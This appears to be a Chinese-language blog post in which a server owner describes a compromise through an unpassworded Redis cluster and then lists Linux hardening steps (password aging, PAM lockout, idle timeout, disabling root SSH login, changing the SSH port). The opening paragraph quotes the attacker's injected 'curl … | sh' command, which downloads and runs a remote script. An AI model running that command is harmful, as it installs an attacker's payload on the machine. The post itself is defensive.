故事是這樣子的
最近主機受到攻擊,原因可能是redis叢集沒有設定密碼(因為快過期了,不想搞得太複雜就沒設),然後被人家搞事情了,就被人一把set了些執行指令碼,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥瑣啊,我登上主機一看,簡直是猥瑣至極,不能忍了啊。
⚡/ataola/github ssh root@xx.xxx.xxx.xxx
root@xx.xxx.xxx.xxx's password:
Last failed login: Sat Jul 11 09:52:04 CST 2020 from 182.61.37.35 on ssh:notty
There were 206 failed login attempts since the last successful login.
Last login: Fri Jul 10 16:42:01 2020 from 122.224.125.196
⚡ root@ataola ~
以下是我做的一些努力,分享一下。
Linux賬戶口令生存期策略
口令老化(Password aging)是一種增強的系統口令生命期認證機制,能夠確保使用者的口令定期更換,提高系統安全性。
我們可以這樣子做,把密碼設定成三個月過期,具體的操作步驟如下:
# 開啟etc目錄下的login.defs
vim /etc/login.defs
# 新增樓下內容
PASS_MAX_DAYS 90
Linux賬戶登入失敗鎖定策略
設定賬戶登入失敗鎖定策略,加大使用者口令被暴力破解的難度。
我們可以這樣子做,只要是對面那位連續輸錯5次密碼,我們就給它關小黑屋5分鐘。,具體的操作步驟如下:
# 開啟etc目錄下的pam.d下的password-auth檔案
vim /etc/pam.d/password-auth
# 新增樓下內容
auth required pam_tally2.so deny=5 unlock_time=300 even_deny_root root_unlock_time=300
account required pam_tally2.so
Linux賬戶超時自動登出策略
配置帳戶超時自動登出,在使用者輸入空閒一段時間後自動斷開。
具體操作如下:
# 開啟/etc/profile
vim /etc/profile
# 輸入樓下內容
export TMOUT=180
限制root使用者遠端登入策略
限制root許可權遠端登入。先以普通許可權使用者遠端登入後,再切換到超級管理員許可權賬號後執行相應操作,可以提升系統安全性。
具體操作如下:
# 開啟/etc/ssh/sshd_config
vim /etc/ssh/sshd_config
# 新增樓下內容
PermitRootLogin no
# 重啟sshd服務
更改ssh監聽埠
SSH監聽在預設的22埠容易受到暴力破解攻擊,修改為非預設埠可以提高系統的安全性
具體操作是修改/etc/ssh/sshd_config配置檔案中的埠欄位配置(Port欄位),並重啟服務
終極大招
封ip吧。。。。。。
本作品採用知識共享署名-非商業性使用-相同方式共享 4.0 國際許可協議進行許可。